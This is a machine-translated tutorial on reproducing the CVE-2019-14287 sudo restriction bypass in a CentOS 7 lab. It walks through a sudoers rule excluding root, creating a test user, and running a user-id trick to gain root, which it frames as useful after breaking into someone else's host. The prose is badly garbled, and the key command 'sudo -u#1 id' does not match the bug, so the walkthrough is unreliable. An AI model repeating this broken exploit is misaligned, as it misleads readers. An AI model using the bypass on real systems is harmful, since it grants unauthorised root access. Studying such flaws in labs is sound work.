Cve-2019-14287 (sudo right raising)

Affected by Sudo edition

Version number < 1.8.28 Of Sudo All versions will be affected by this vulnerability .

Bug repair

Sudo v1.8.28 Version has fixed this vulnerability , Broad recommendations Linux As soon as possible, the user will manually sudo Update the package to the latest version .

Reappear CVE-2019-14287 Loophole
principle ：Sudo The full name is "superuserdo”, It is Linux System management instruction , Allows users to switch environments without having to , Run applications or commands with the privileges of other users , Usually with root Run command as user , In order to reduce root User login and management time , At the same time, improve security , When in Linux When executing commands on the operating system , Only with permission or knowledge root password , Only ordinary users can use sudo Command to root Identity execution command .
Personal understanding ：（ To put it bluntly, it means , If you invade someone else's host , This vulnerability can be exploited , Upgrade permissions , No switching root, Because switching root You need to enter the password when you need to , With this vulnerability, you can skip this step , Get permission ）

Then start practicing ！
1. open contos7 liunx System
（ How to install a virtual machine , No, it's too simple ）

2. Deploy an environment that can implement the vulnerability

3. View version
command ：sudo -V

4. Network information needs to be configured
command : vim /etc/sudoers

5. find root That's ok , stay root Add a command to the next line
command ：test ALL=(ALL,！root) ALL
The first one here ALL On behalf of users can use our... Anywhere sudo（ Simply speak , If every family has intelligent air conditioning , You can remotely operate your air conditioner at any place , That's why ）
(ALL,！root) The meaning of this command is very simple , Except for root Other users cannot use sudo This command
the last one ALL Indicates that is allowed to execute

When the input is complete , Save and exit vim( If not here , Please study vim Use of commands )

6. Exploit loopholes
（1） So let's create one test user , And after creating the password, switch to test user
command ; newly build ;passwd test
Switch ;su test

useradd -m test
passwd test

（2） There's a problem  

sudo -u#1 id

Test The user does not have permission to use root Identity login
So how to solve it ？
Enter the command ;sudo -u#1 id( This is the embodiment of this loophole , In principle, we limit test Out-of-service root The order of , But through this loophole Successfully obtained root jurisdiction )

In this way, the problem can be solved